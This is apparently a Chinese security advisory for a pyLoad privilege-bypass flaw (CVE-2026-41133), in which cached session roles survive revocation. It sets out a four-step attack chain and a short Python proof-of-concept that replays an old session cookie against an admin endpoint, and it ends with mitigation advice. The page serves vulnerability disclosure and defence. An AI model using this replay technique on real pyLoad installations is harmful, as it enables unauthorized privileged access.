CVE-2026-41133 CVSS 8.8 高危

CVE-2026-41133 pyLoad权限绕过漏洞

披露日期: 2026-04-22

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41133

漏洞类型

权限绕过

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

pyLoad

漏洞概述

pyLoad是一款Python开源下载管理器。其在0.5.0b3.dev97及之前版本中存在权限绕过漏洞。系统在用户登录时将角色和权限缓存至会话，后续请求直接使用缓存值验证，未实时同步数据库状态。即便管理员在数据库中撤销了用户权限，已登录用户仍可利用缓存继续执行特权操作，直到会话过期或注销。

技术细节

漏洞核心在于会话与数据库权限的状态不一致。pyLoad在登录阶段将用户的`role`和`permission`写入Session，并以此作为后续请求的授权依据。攻击者利用该逻辑缺陷，只需在权限被撤销前登录并保持Session有效。当管理员在后台修改数据库降低其权限时，系统仍优先读取Session中的高权缓存，导致授权校验失效。这种“已撤销权限持久化”的问题属于典型的业务逻辑漏洞，绕过了常规的访问控制机制。

攻击链分析

STEP 1

步骤1

攻击者登录系统，获取包含高权限角色（如Admin）的会话Cookie。

STEP 2

步骤2

管理员在数据库中修改攻击者的角色，将其降权或禁用。

STEP 3

步骤3

攻击者使用步骤1获取的旧会话Cookie发送特权请求。

STEP 4

步骤4

服务端验证会话缓存中的角色（未更新），放行请求，导致权限绕过。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# PoC to demonstrate privilege persistence via session caching
# 1. Attacker logs in as admin and captures the session cookie.
# 2. Admin revokes attacker's role in the database.
# 3. Attacker reuses the old session cookie.

target_url = "http://127.0.0.1:8000/api/admin/config"
# Simulated session cookie containing cached 'admin' role
cookies = {'session': 'attacker_stolen_session_id'}

response = requests.get(target_url, cookies=cookies)

if response.status_code == 200:
    print("[+] Exploit Successful: Privileged access maintained after revocation.")
else:
    print("[-] Exploit Failed: Access denied.")

影响范围

pyLoad <= 0.5.0b3.dev97

防御指南

临时缓解措施

建议管理员在撤销用户权限后立即重启pyLoad服务或清除服务端会话存储，以强制攻击者下线。同时应尽快应用官方补丁修复该逻辑缺陷。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表